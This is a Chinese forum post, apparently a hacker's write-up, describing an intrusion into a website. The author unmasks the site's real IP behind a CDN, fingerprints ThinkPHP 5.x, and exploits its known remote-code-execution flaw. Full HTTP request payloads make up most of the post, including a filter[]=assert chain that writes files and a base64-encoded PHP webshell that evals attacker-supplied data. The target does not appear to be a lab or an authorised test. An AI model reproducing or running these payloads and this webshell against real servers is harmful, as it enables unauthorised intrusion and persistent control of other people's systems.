-
-
[原创]在吗?网站发来 打你一下
-
发表于: 2023-4-7 04:33
-
开局一张图,内容全靠吹
目标站没有东西,尝试了找旁站
有cdn,通过fofa搜索特征找到真实IP
发现一个旁站,内容都空的
指纹识别发现thinkphp5.x
尝试一键化工具:
发现一个能检测:
1 2 3 4 | GET /?s=index/\think\Request/input&filter=md5&data=0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:1.7.1) Gecko/20040707Host: <ip>Connection: close |
状态码911,但感觉不太像误报,尝试大量payload,发现一个有问题
1 2 3 4 5 6 | POST /?s=captcha&test=-a HTTP/1.1Host:<ip>User-Agent:Mozilla/5.0Content-Length:70Accept: text/html, image/gif, image/jpeg, *; q=2, */*; q=2Connection: close |
UA头枚举
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 | POST /?s=captcha&test=-1 HTTP/2Host: <ip>Cookie: PHPSESSID=11111Content-Length: 1150Cache-Control: max-age=0Sec-Ch-Ua: "Not_A Brand";v="99", "Google Chrome";v="109", "Chromium";v="109"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "macOS"Upgrade-Insecure-Requests: 1Origin: <ip>Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://<ip>/?s=captcha&test=-1Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9 |
通过UA枚举payload成功拿到执行phpinfo
通过phpinfo找到路径后,disable function函数禁掉部分命令执行函数,但是没禁掉assert,简单上个一句话
1 | _method=__construct&method=get&filter[]=assert&get[1][0]=file_put_contents('/data/wwwroot/<路径>/public/<文件名>.php','<webshell>')&get[1][1]=phpinfo |
好家伙,马子直接被杀,转换一下,采用冰蝎或者免杀马,用Base64方法写入根目录文件
奥力给!!!!
1 | _method=__construct&method=get&filter[]=assert&get[1][0]=file_put_contents('/data/wwwroot/<>/public/<name>',base64_decode("PD9waHAKQHNlc3Npb25fc3RhcnQoKTsKQHNldF90aW1lX2xpbWl0KDApOwpAZXJyb3JfcmVwb3J0aW5nKDApOwpmdW5jdGlvbiBlbmNvZGUoJEQsJEspewogICAgZm9yKCRpPTA7JGk8c3RybGVuKCREKTskaSsrKSB7CiAgICAgICAgJGMgPSAkS1skaSsxJjE1XTsKICAgICAgICAkRFskaV0gPSAkRFskaV1eJGM7CiAgICB9CiAgICByZXR1cm4gJEQ7Cn0KJHBheWxvYWROYW1lPSdwYXlsb2FkJzsKJGtleT0nM2M2ZTBiOGE5YzE1MjI0YSc7CiRkYXRhPWZpbGVfZ2V0X2NvbnRlbnRzKCJwaHA6Ly9pbnB1dCIpOwppZiAoJGRhdGEhPT1mYWxzZSl7CiAgICAkZGF0YT1lbmNvZGUoJGRhdGEsJGtleSk7CiAgICBpZiAoaXNzZXQoJF9TRVNTSU9OWyRwYXlsb2FkTmFtZV0pKXsKICAgICAgICAkcGF5bG9hZD1lbmNvZGUoJF9TRVNTSU9OWyRwYXlsb2FkTmFtZV0sJGtleSk7CiAgICAgICAgaWYgKHN0cnBvcygkcGF5bG9hZCwiZ2V0QmFzaWNzSW5mbyIpPT09ZmFsc2UpewogICAgICAgICAgICAkcGF5bG9hZD1lbmNvZGUoJHBheWxvYWQsJGtleSk7CiAgICAgICAgfQoJCWV2YWwoJHBheWxvYWQpOwogICAgICAgIGVjaG8gZW5jb2RlKEBydW4oJGRhdGEpLCRrZXkpOwogICAgfWVsc2V7CiAgICAgICAgaWYgKHN0cnBvcygkZGF0YSwiZ2V0QmFzaWNzSW5mbyIpIT09ZmFsc2UpewogICAgICAgICAgICAkX1NFU1NJT05bJHBheWxvYWROYW1lXT1lbmNvZGUoJGRhdGEsJGtleSk7CiAgICAgICAgfQogICAgfQp9Cg=="))&get[1][1]=phpinfo |
[培训]Windows内核深度攻防:从Hook技术到Rootkit实战!
|
|
|---|---|
|
|
|
|
|
f8eK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6%4N6%4N6Q4x3X3g2U0K9h3q4Q4x3X3g2Y4L8%4k6Q4x3V1j5`.
2dbK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4g2K6j5g2)9J5k6h3N6G2N6W2)9J5c8R3`.`. 
|
|
|
cb3K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3N6G2N6W2)9J5k6h3y4G2L8b7`.`.
|
|
|
 78dK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6%4N6%4N6Q4x3X3g2F1j5i4y4S2i4K6u0W2k6$3!0$3i4K6u0r3 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
